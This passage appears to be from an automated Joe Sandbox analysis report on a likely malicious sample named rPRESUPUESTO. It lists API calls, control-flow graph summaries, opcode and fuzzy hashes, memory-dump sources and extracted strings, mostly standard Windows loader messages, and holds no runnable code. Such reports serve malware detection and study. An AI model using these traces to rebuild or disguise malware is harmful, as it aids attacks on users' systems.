                                                • Opcode ID: a9efdf416b95ef5c2006c012b51f17d293dbffb2088d5de79bfca56271637e4c
                                                • Instruction ID: b6459f3edac44bdf89660490404d8ab24c4872c40b9c9aff465eae100ee13c8e
                                                • Opcode Fuzzy Hash: a9efdf416b95ef5c2006c012b51f17d293dbffb2088d5de79bfca56271637e4c
                                                • Instruction Fuzzy Hash: A090023120141417D51271584505707004997D1341F95C412E5438558DDA568B96A222
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 13cb389ae476d0ef52cd17d278a4fa07f95ac71ad8ad8ad1813e99a4aa31ac6f
                                                • Instruction ID: 64ee5e008ccd1cbe1113d2d323223580a9ca97d6900696a487d90a2a79887d76
                                                • Opcode Fuzzy Hash: 13cb389ae476d0ef52cd17d278a4fa07f95ac71ad8ad8ad1813e99a4aa31ac6f
                                                • Instruction Fuzzy Hash: C390023120149806D5117158840574A004597D1301F59C411E9438658DCA958AD57222
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b521ac98b6a3ac880985078c55c6cb4fa047887e037e4c485760f01774324154
                                                • Instruction ID: 54c10105b04716dc5ac85bad8c0aed57fb5347fcacc74c9137f577b6d3274b23
                                                • Opcode Fuzzy Hash: b521ac98b6a3ac880985078c55c6cb4fa047887e037e4c485760f01774324154
                                                • Instruction Fuzzy Hash: 7E90023160551406D50171584515706104597D1301F65C411E5438568DCB958B9566A3

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(07c402-5,00000111,00000000,00000000), ref: 0041425A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_rPRESUPUESTO.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: )bvl$07c402-5$07c402-5
                                                • API String ID: 1836367815-996227108
                                                • Opcode ID: d8aa882d647f5268c30fd1c78c96303e60bcb9a8bc33171214c54254062d28cc
                                                • Instruction ID: 7cb0f372ef88164581115421a1cd4eee5c090dfbcfdfeff10b8cff148b1f3543
                                                • Opcode Fuzzy Hash: d8aa882d647f5268c30fd1c78c96303e60bcb9a8bc33171214c54254062d28cc
                                                • Instruction Fuzzy Hash: 8D1102B2D0125C7AEB11AAD18C82DEF7B7CDF80398F448069FD00A7240D6784E4247F5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 16 4140c8-414135 17 414137 16->17 18 41415c-414162 16->18 17->18 19 414181-414185 18->19 20 414163-41417e 18->20 21 414187-4141a7 19->21 22 4141cf 19->22 20->19 21->20 23 4141a9-4141aa 21->23 24 4141d1-4141da 22->24 25 414232-41424d 22->25 28 4141f7-414231 call 42dfb3 call 417bb3 call 4048a3 call 4248f3 23->28 29 4141ac-4141af 23->29 26 41426d-414273 25->26 27 41424f-41425e PostThreadMessageW 25->27 27->26 30 414260-41426a 27->30 28->25 31 4141b2-4141b9 29->31 30->26 31->31 33 4141bb-4141cc 31->33 33->22
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_rPRESUPUESTO.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 07c402-5$07c402-5
                                                • API String ID: 0-1844765358
                                                • Opcode ID: fdf0240e6745b5eed38a101919f609dcd16858f600de99b47a4e80dd22b8a976
                                                • Instruction ID: 149ae14f2676c057c8877caf492b042c2eb623401663fb4c3d9565327f5db11d
                                                • Opcode Fuzzy Hash: fdf0240e6745b5eed38a101919f609dcd16858f600de99b47a4e80dd22b8a976
                                                • Instruction Fuzzy Hash: B341F273D492497BD7029FA8DC819DEBB78EFD1314B08429AE8549B242D339CD8387D5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 41 4141e3-414202 call 42d5a3 44 414208-41424d call 417bb3 call 4048a3 call 4248f3 41->44 45 414203 call 42dfb3 41->45 53 41426d-414273 44->53 54 41424f-41425e PostThreadMessageW 44->54 45->44 54->53 55 414260-41426a 54->55 55->53
                                                APIs
                                                • PostThreadMessageW.USER32(07c402-5,00000111,00000000,00000000), ref: 0041425A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_rPRESUPUESTO.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 07c402-5$07c402-5
                                                • API String ID: 1836367815-1844765358
                                                • Opcode ID: b1ec65bc22d4f7fd96de36f2e7793c8796d5397ff220ddd8ffc0aeef16c29bc4
                                                • Instruction ID: d2e21c5aabd2505fa775553f00fdb3f740febffd9e454fe4703a4cd51b74df20
                                                • Opcode Fuzzy Hash: b1ec65bc22d4f7fd96de36f2e7793c8796d5397ff220ddd8ffc0aeef16c29bc4
                                                • Instruction Fuzzy Hash: 220108B2D0115C7AEB00AAD18C81DEF7B7CDF80398F408069F90067240D57C4E4647F5

                                                Control-flow Graph

                                                control_flow_graph 70 42b973-42b9b4 call 404933 call 42c6d3 RtlFreeHeap
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B9AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_rPRESUPUESTO.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: aiA
                                                • API String ID: 3298025750-61921773
                                                • Opcode ID: d8e14b4801b469f8c448accff43e4f25ba1102dc513a2ef6dbe5f4afabfd882a
                                                • Instruction ID: 4cca70c05f9cbe06103fe4a0f8443e2fa92374340de6d0b84716e52d5f56089a
                                                • Opcode Fuzzy Hash: d8e14b4801b469f8c448accff43e4f25ba1102dc513a2ef6dbe5f4afabfd882a
                                                • Instruction Fuzzy Hash: 26E092B2200208BBC610EE59DC85FDB37ACDFC9714F004019FD08A7242D670B9118BB5

                                                Control-flow Graph

                                                control_flow_graph 65 42b923-42b964 call 404933 call 42c6d3 RtlAllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000,?,00000000,aiA,?,004244CF), ref: 0042B95F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_rPRESUPUESTO.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: aiA
                                                • API String ID: 1279760036-61921773
                                                • Opcode ID: 459a9e9d97f117b96781480ccda9a116c2493a52d9627519e06641746f610406
                                                • Instruction ID: c15df0c3d5bc6c0424d339084049dda4fc6254e6d898e36fc7a111d8aa366236
                                                • Opcode Fuzzy Hash: 459a9e9d97f117b96781480ccda9a116c2493a52d9627519e06641746f610406
                                                • Instruction Fuzzy Hash: 41E092B2200204BBD610EF59EC41FDB37ADDFC9710F004029F908A7241DA70B9118BB4

                                                Control-flow Graph

                                                control_flow_graph 129 42b9c3-42b9fc call 404933 call 42c6d3 ExitProcess
                                                APIs
                                                • ExitProcess.KERNEL32(?,00000000,?,?,90F25BD7,?,?,90F25BD7), ref: 0042B9F7
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_rPRESUPUESTO.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: f94207f527ea87a61840077744958865a5fbbc3ef26220fc67fc4befdad32aec
                                                • Instruction ID: 664edad2cae747dec129f77787be34d0824e908f389dad7092f910b2453410d0
                                                • Opcode Fuzzy Hash: f94207f527ea87a61840077744958865a5fbbc3ef26220fc67fc4befdad32aec
                                                • Instruction Fuzzy Hash: 73E086716446147BC620EA5AEC41FDB776CDFC5714F004429FA0CA7181C6747A0187F4

                                                Control-flow Graph

                                                control_flow_graph 134 1812c0a-1812c0f 135 1812c11-1812c18 134->135 136 1812c1f-1812c26 LdrInitializeThunk 134->136
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6821069460c1346d77b167690b537749fbb404e49ead14cb2e7b36270e9c5721
                                                • Instruction ID: 9abed68a71e7f21ee72063e5296d6cea9277a80b7ede74f5c0e266b0cb339ce4
                                                • Opcode Fuzzy Hash: 6821069460c1346d77b167690b537749fbb404e49ead14cb2e7b36270e9c5721
                                                • Instruction Fuzzy Hash: 47B09B729015D5CADE12E7644609717794577D1701F25C061D3034641F4738C2D5E276
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2160512332
                                                • Opcode ID: 32e67eac29a86e69931b0fe6a706837c6202a154f993a8fd876c7ac888c63953
                                                • Instruction ID: e22d66a33724d25415eeb6b4c94da776908a07403dda96bc1602e299c3e829fd
                                                • Opcode Fuzzy Hash: 32e67eac29a86e69931b0fe6a706837c6202a154f993a8fd876c7ac888c63953
                                                • Instruction Fuzzy Hash: 83928B71604346EBE761CE28C884B6BB7EAFB84754F04482DFE94D7251DB70EA44CB92
                                                Strings
                                                • Critical section address, xrefs: 01845425, 018454BC, 01845534
                                                • undeleted critical section in freed memory, xrefs: 0184542B
                                                • Thread identifier, xrefs: 0184553A
                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01845543
                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0184540A, 01845496, 01845519
                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018454E2
                                                • double initialized or corrupted critical section, xrefs: 01845508
                                                • Invalid debug info address of this critical section, xrefs: 018454B6
                                                • Critical section address., xrefs: 01845502
                                                • 8, xrefs: 018452E3
                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018454CE
                                                • corrupted critical section, xrefs: 018454C2
                                                • Critical section debug info address, xrefs: 0184541F, 0184552E
                                                • Address of the debug info found in the active list., xrefs: 018454AE, 018454FA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                • API String ID: 0-2368682639
                                                • Opcode ID: 6d5c65e63a404886b9ebe5d70ec052ae9ed3c8d2891c6f304a832a6d8a783a78
                                                • Instruction ID: ee40f0e787f32a41f7f3071e9a06d798941f657dec829e94d1d437be626d19ae
                                                • Opcode Fuzzy Hash: 6d5c65e63a404886b9ebe5d70ec052ae9ed3c8d2891c6f304a832a6d8a783a78
                                                • Instruction Fuzzy Hash: 05818BB1A01348EFDB60CF99C895BAEFBB9BB09B14F204119F504F7280D775AA40CB91
                                                Strings
                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01842506
                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018424C0
                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018425EB
                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01842498
                                                • @, xrefs: 0184259B
                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01842409
                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018422E4
                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0184261F
                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01842412
                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01842624
                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01842602
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                • API String ID: 0-4009184096
                                                • Opcode ID: 2b159785fe14f823caa6a284def5a938fde4603d30f08cafcc584dafe5bd37c8
                                                • Instruction ID: 7d616b67dd7af230feeb6a64b3b024f8ee374f586bf80511db00f979bc79c603
                                                • Opcode Fuzzy Hash: 2b159785fe14f823caa6a284def5a938fde4603d30f08cafcc584dafe5bd37c8
                                                • Instruction Fuzzy Hash: 05025DF1D0422D9BDB61DB58CD84BEAB7B9AB54304F0041DAA609E7281EB709F84CF59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                • API String ID: 0-2515994595
                                                • Opcode ID: a918722500ec22520117a1c1398d694cc7ace1b337a6b5db6883e61c1853d9df
                                                • Instruction ID: 011302f9648a260cfa19288f14338b6a81cba12d8fe039db3016c9ee1c186708
                                                • Opcode Fuzzy Hash: a918722500ec22520117a1c1398d694cc7ace1b337a6b5db6883e61c1853d9df
                                                • Instruction Fuzzy Hash: 5B51BDB16083059BD329CF188848BABBBECFFD5754F544A2DAA99C3241E770D704CB92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                • API String ID: 0-1700792311
                                                • Opcode ID: 667bcadffc36d4355dc9d3717a412f76bf6db056306887a1b3a6b723a636a173
                                                • Instruction ID: 7a2a7d2e63cd473f90a200084fec6757d5fba0857696dd771d0afb9099b92b54
                                                • Opcode Fuzzy Hash: 667bcadffc36d4355dc9d3717a412f76bf6db056306887a1b3a6b723a636a173
                                                • Instruction Fuzzy Hash: C2D1CF7160068ADFDB22EF68C455AA9FBF1FF49718F18805DF445EB252C7349A89CB20
                                                Strings
                                                • AVRF: -*- final list of providers -*- , xrefs: 01858B8F
                                                • VerifierDlls, xrefs: 01858CBD
                                                • VerifierFlags, xrefs: 01858C50
                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01858A3D
                                                • HandleTraces, xrefs: 01858C8F
                                                • VerifierDebug, xrefs: 01858CA5
                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01858A67
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                • API String ID: 0-3223716464
                                                • Opcode ID: 7dd223d3d8e2f1e1d3269e6c184cd266b90e8940eb264cf22a030b3c4f925432
                                                • Instruction ID: 4a242e82d1f05851f208b1c472cc2d7a86edc68bc6d8f15e87f5ce46dbf43b1b
                                                • Opcode Fuzzy Hash: 7dd223d3d8e2f1e1d3269e6c184cd266b90e8940eb264cf22a030b3c4f925432
                                                • Instruction Fuzzy Hash: 2D91F3B1A01716DFDB62DF2E8880B5AB7E9EB55B14F05045EFE45EB241D730AF008B92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-792281065
                                                • Opcode ID: 89a5727e7a8eb199de6d3b14ce549dd3379b8939b3293109bbcefebe63489278
                                                • Instruction ID: 39432629c7a31e51ea3777de6a29301aee13f7e86cb6d7edfee2f11f062a0b0e
                                                • Opcode Fuzzy Hash: 89a5727e7a8eb199de6d3b14ce549dd3379b8939b3293109bbcefebe63489278
                                                • Instruction Fuzzy Hash: AD911871B0171D9BEB26DF58DC84BAA7BA1BF50B18F250129EA00E72C5EB749701CB91
                                                Strings
                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01829A2A
                                                • apphelp.dll, xrefs: 017C6496
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01829A11, 01829A3A
                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01829A01
                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018299ED
                                                • LdrpInitShimEngine, xrefs: 018299F4, 01829A07, 01829A30
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-204845295
                                                • Opcode ID: c1c12f80b5578cb6ed599ee1f1afb59078339f055a17402aff2a85a8dcf3410a
                                                • Instruction ID: 29ee7f0339040213db13e6546e45ed177dd144fce12f35bd836dda59cae4134a
                                                • Opcode Fuzzy Hash: c1c12f80b5578cb6ed599ee1f1afb59078339f055a17402aff2a85a8dcf3410a
                                                • Instruction Fuzzy Hash: 385104716083149FD721DF24D895FABB7E8FB84B48F10091EF98697265DB30EA44CB92
                                                Strings
                                                • Loading import redirection DLL: '%wZ', xrefs: 01848170
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0180C6C3
                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 018481E5
                                                • LdrpInitializeProcess, xrefs: 0180C6C4
                                                • LdrpInitializeImportRedirection, xrefs: 01848177, 018481EB
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01848181, 018481F5
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-475462383
                                                • Opcode ID: 9f25f0b83bdd5fae3c4303db6f91d1175cadb23b20b71472b531d497f3f0fa63
                                                • Instruction ID: 9b2608f52fdf11b4fa62074354100d5a6a8692400fdff31907caabd1b29e85c8
                                                • Opcode Fuzzy Hash: 9f25f0b83bdd5fae3c4303db6f91d1175cadb23b20b71472b531d497f3f0fa63
                                                • Instruction Fuzzy Hash: DC31F5B164474A9FC224EE68DD45E1AB794EF90B14F01055CF940AB295EB20EE04C7A2
                                                Strings
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018421BF
                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0184219F
                                                • SXS: %s() passed the empty activation context, xrefs: 01842165
                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01842178
                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01842180
                                                • RtlGetAssemblyStorageRoot, xrefs: 01842160, 0184219A, 018421BA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                • API String ID: 0-861424205
                                                • Opcode ID: 539ba441eaf2a2284babf8e309719a7e3150dc15e3d28bcb7c9688b0ab9dc3f4
                                                • Instruction ID: bbe57067eed31e1326f86fc843e7bdd9ce301d5e1e3059e5a7a53363ce13a218
                                                • Opcode Fuzzy Hash: 539ba441eaf2a2284babf8e309719a7e3150dc15e3d28bcb7c9688b0ab9dc3f4
                                                • Instruction Fuzzy Hash: 8D312B76F4021D77F7229A999C85F9BBB7ADBA4B90F054059BB04F7180D7B0AB00C7A1
                                                APIs
                                                  • Part of subcall function 01812DF0: LdrInitializeThunk.NTDLL ref: 01812DFA
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01810BA3
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01810BB6
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01810D60
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01810D74
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                • String ID:
                                                • API String ID: 1404860816-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-379654539
                                                Strings
                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0180855E
                                                • @, xrefs: 01808591
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01808421
                                                • LdrpInitializeProcess, xrefs: 01808422
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1918872054
                                                Strings
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018422B6
                                                • SXS: %s() passed the empty activation context, xrefs: 018421DE
                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018421D9, 018422B1
                                                • .Local, xrefs: 018028D8
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                • API String ID: 0-1239276146
                                                Strings
                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0184342A
                                                • RtlDeactivateActivationContext, xrefs: 01843425, 01843432, 01843451
                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01843437
